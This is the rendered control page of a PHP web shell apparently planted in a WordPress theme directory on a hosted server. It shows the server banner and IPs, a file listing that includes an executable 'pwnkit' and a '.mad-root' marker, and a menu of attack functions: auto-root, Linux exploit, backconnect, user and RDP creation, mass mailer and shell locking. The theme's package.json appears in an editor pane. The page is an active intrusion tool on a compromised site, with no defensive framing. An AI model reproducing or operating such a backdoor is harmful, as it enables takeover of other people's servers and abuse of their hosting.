Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
themes /
twentytwenty /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
813
B
-rw-r--r--
comments.php
3.05
KB
-rw-r--r--
footer.php
2.07
KB
-rw-r--r--
functions.php
28.77
KB
-rw-r--r--
header.php
4.96
KB
-rw-r--r--
index.php
2.9
KB
-rw-r--r--
package-lock.json
1.16
MB
-rw-r--r--
package.json
2.07
KB
-rw-r--r--
print.css
2.64
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
5.88
KB
-rw-r--r--
screenshot.png
51.82
KB
-rw-r--r--
searchform.php
1.65
KB
-rw-r--r--
singular.php
550
B
-rw-r--r--
style-rtl.css
119.57
KB
-rw-r--r--
style.css
120.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "twentytwenty", "version": "3.1.0", "description": "Default WP Theme", "author": "The WordPress Contributors", "license": "GPL-2.0-or-later", "keywords": [ "WordPress", "Theme", "TwentyTwenty" ], "homepage": "https://wordpress.org/themes/twentytwenty/", "repository": { "type": "svn", "url": "https://develop.svn.wordpress.org/trunk" }, "bugs": { "url": "https://core.trac.wordpress.org/" }, "engines": { "node": ">=16", "npm": ">=9.8.1" }, "devDependencies": { "@wordpress/browserslist-config": "^6.34.0", "@wordpress/scripts": "^30.27.0", "autoprefixer": "^10.4.22", "concurrently": "^9.2.1", "postcss": "^8.5.6", "postcss-cli": "^11.0.1", "rtlcss": "^4.3.0", "stylelint-a11y": "^1.2.3" }, "browserslist": [ "extends @wordpress/browserslist-config" ], "rtlcssConfig": { "options": { "autoRename": false, "autoRenameStrict": false, "clean": true, "greedy": false, "processUrls": false, "stringMap": [] }, "plugins": [], "map": false }, "scripts": { "build": "npm run build:vendor-prefixes && npm run build:rtl", "build:rtl": "concurrently \"npm run build:rtl-style\" \"npm run build:rtl-esb\" \"npm run build:rtl-esc\"", "build:rtl-style": "rtlcss style.css style-rtl.css", "build:rtl-esb": "rtlcss assets/css/editor-style-block.css assets/css/editor-style-block-rtl.css", "build:rtl-esc": "rtlcss assets/css/editor-style-classic.css assets/css/editor-style-classic-rtl.css", "build:vendor-prefixes": "concurrently \"npm run build:vendor-prefixes-style\" \"npm run build:vendor-prefixes-esb\" \"npm run build:vendor-prefixes-esc\"", "build:vendor-prefixes-style": "postcss -r --no-map style.css assets/css/editor-style-block.css assets/css/editor-style-classic.css", "build:vendor-prefixes-esb": "postcss -r --no-map assets/css/editor-style-block.css ", "build:vendor-prefixes-esc": "postcss -r --no-map assets/css/editor-style-classic.css", "lint:css": "wp-scripts lint-style 'style.css' 'assets/**/*.css'", "lint:js": "wp-scripts lint-js 'assets/**/*.js'", "lint:pkg-json": "wp-scripts lint-pkg-json" } }
Close